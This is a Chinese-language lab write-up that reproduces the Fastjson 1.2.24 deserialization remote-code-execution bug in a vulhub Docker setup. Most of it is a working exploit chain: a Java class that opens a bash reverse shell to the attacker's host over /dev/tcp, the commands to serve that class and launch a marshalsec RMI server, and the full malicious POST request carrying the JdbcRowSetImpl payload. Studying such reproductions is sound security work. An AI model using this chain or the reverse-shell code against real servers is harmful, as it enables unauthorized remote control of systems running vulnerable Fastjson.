漏洞影响范围
fastjsonfastjson<=1.2.24
环境搭建:
1.拉取docker:
cd /home/kali/桌面/vulhub/fastjson/1.2.24-rce
sudo docker-compose up -d
2.查看docker端口映射信息
sudo docker ps
3.在浏览器中输入http://192.168.5.143:8090/
漏洞复现
- 探测fastjson版本
抓包修改post提交方式并且添加内容{"@type":"java.lang.AutoCloseable"(显示失败)
- 新建TouchFile.java文件内容为:
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime r = Runtime.getRuntime();
Process p = r.exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/192.168.5.143/4444 0>&1"});
p.waitFor();
} catch (Exception e) {
}
}
}
然后使用javac 命令对TouchFile.java文件进行编译。(javac TouchFile.java)
- 在kali 中使用python开启http服务
python3 -m http.server 1134
把刚才反编译的TouchFile.java放到当前目录下输入http://192.168.5.143:1134/进行检查
使用marshalsec-0.0.3-SNAPSHOT-all.jar
下载地址:https://github.com/RandomRobbieBF/marshalsec-jar
启动一个RMI服务,加载远程类TouchFile.class。
Java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.5.143:1134/#TouchFile" 9996
然后在kali上用NC开启端口监听:
抓包修改post方式,并且添加下面的内容
POST / HTTP/1.1
Host: 192.168.5.143:8090
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 162
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://192.168.5.143:9996/TouchFile",
"autoCommit":true
}
}
结果:
并且弹回shell
参考:
https://blog.csdn.net/weixin_44146996/article/details/111860438?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164499669816780366586530%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=164499669816780366586530&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-1-111860438.pc_search_result_cache&utm_term=Fastjson1.2.24RCE%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0&spm=1018.2226.3001.4187